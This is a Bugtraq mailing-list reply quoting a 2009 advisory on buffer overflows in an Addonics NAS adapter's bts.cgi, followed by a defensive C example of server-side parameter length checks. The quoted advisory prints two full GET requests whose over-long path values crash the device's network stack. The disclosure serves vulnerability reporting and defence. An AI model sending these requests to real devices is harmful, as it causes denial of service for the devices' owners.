Re: Addonics NAS Adapter (bts.cgi) Remote DoS Exploit (post-auth

Board: Bugtraq, posted 2009/04/22 02:01
Have any of these buffer overflows been debugged and/or proven exploitable? Is debugging practical on this device? More details may suffice the mind.

On Mon, Apr 20, 2009 at 4:12 PM, <mcyr2@csc.com> wrote:
> Remote: Yes
> Local: No
> Credit: Mike Cyr, aka h00die
> Vulnerable: NASU2FW41 Loader 1.17
> Not Vulnerable:
>
> Discussion:
>
> Addonics NAS Adapter Post-Auth DoS
>
> Addonics NAS Adapter is prone to several post authentication buffer overflows. Each of these buffer overflows will crash the entire TCP/IP stack and the device will have to be power cycled to restore any functionality. Addonics currently has implemented GUI level (client side) controls for preventing long inputs, but by simply doing a direct HTTP GET request (the device doesn't use POST) this can be bypassed.
>
> Addonics was notified of the buffer overflows via ticket 497283 on March 25, 2009. Vendor acknowledgment on March 26, 2009.
>
> Exploiting these issues will crash the network stack and create a Denial of Service condition.
>
> Firmware NASU2FW41 Loader1.17 are vulnerable; other versions may also be.
>
> Exploit:
>
> http://www.milw0rm.com/exploits/8490
>
> Attackers can use a browser to exploit these issues.
>
> The following GET requests will result in the TCP/IP stack crashing and the device requiring a reboot
>
> 1.
Bittorrent: Download Path > > http://<ip>/bts.cgi?redirect=3Dbt.htm&failure=3Dfail.htm&type=3Dbt_search= _apply&torrent_path=3D&download_path=3Daaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa= aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa= aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa= aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa= aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa= aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa= aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa= aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa > > 2. Bittorent: torrent path > > http://<ip>/bts.cgi?redirect=3Dbt.htm&failure=3Dfail.htm&type=3Dbt_search= _apply&torrent_path=3Daaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa= aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa= aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa= aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa= aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa= aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa= aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa= aaaaaaaaaaaaaaaaaa&download_path=3DPUBLIC > > > > References: > > Vendor/Product Website: http://www.addonics.com/products/nas/nasu2.asp >
Article code (AID): #19xWdb00 (Bugtraq)
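
The advisory quoted above says the only limit on input length is a client-side GUI control, which a direct GET request never passes through. The following is an added example, not code from the original post or from the Addonics firmware, of the server-side length check that such a control cannot replace. `get_param`, `check_bt_request` and `MAX_PATH_VALUE` are hypothetical names, and the 128-byte limit is an assumption.

```c
#include <stdio.h>
#include <string.h>

#define MAX_PATH_VALUE 128 /* assumed limit; the firmware's real one is not on the page */
enum { PARAM_OK = 0, PARAM_MISSING = -1, PARAM_TOO_LONG = -2 };

/* Copy the value of `name` from a raw query string into out[outsz]. The length
 * is checked before any copy, so an over-long value is rejected, not truncated. */
int get_param(const char *query, const char *name, char *out, size_t outsz)
{
    size_t nlen = strlen(name);
    const char *p = query;
    while (p && *p) {
        const char *end = strchr(p, '&');
        size_t plen = end ? (size_t)(end - p) : strlen(p);
        if (plen > nlen && strncmp(p, name, nlen) == 0 && p[nlen] == '=') {
            size_t vlen = plen - nlen - 1;
            if (vlen >= outsz)
                return PARAM_TOO_LONG;
            memcpy(out, p + nlen + 1, vlen);
            out[vlen] = '\0';
            return PARAM_OK;
        }
        p = end ? end + 1 : NULL;
    }
    return PARAM_MISSING;
}

/* Server-side gate for a bt_search_apply request: HTTP status to send. */
int check_bt_request(const char *query)
{
    char torrent[MAX_PATH_VALUE], download[MAX_PATH_VALUE];
    if (get_param(query, "torrent_path", torrent, sizeof torrent) != PARAM_OK)
        return 400;
    if (get_param(query, "download_path", download, sizeof download) != PARAM_OK)
        return 400;
    return 200;
}

int main(void)
{
    char q[700] = "type=bt_search_apply&torrent_path=&download_path=";
    size_t n = strlen(q);
    memset(q + n, 'a', 600); /* constructed over-long value */
    q[n + 600] = '\0';
    printf("long value  -> %d\n", check_bt_request(q));
    printf("short value -> %d\n", check_bt_request("torrent_path=&download_path=PUBLIC"));
    return 0;
}
```

The check runs on the raw query string before any percent-decoding, so decoding the accepted value afterwards can only make it shorter.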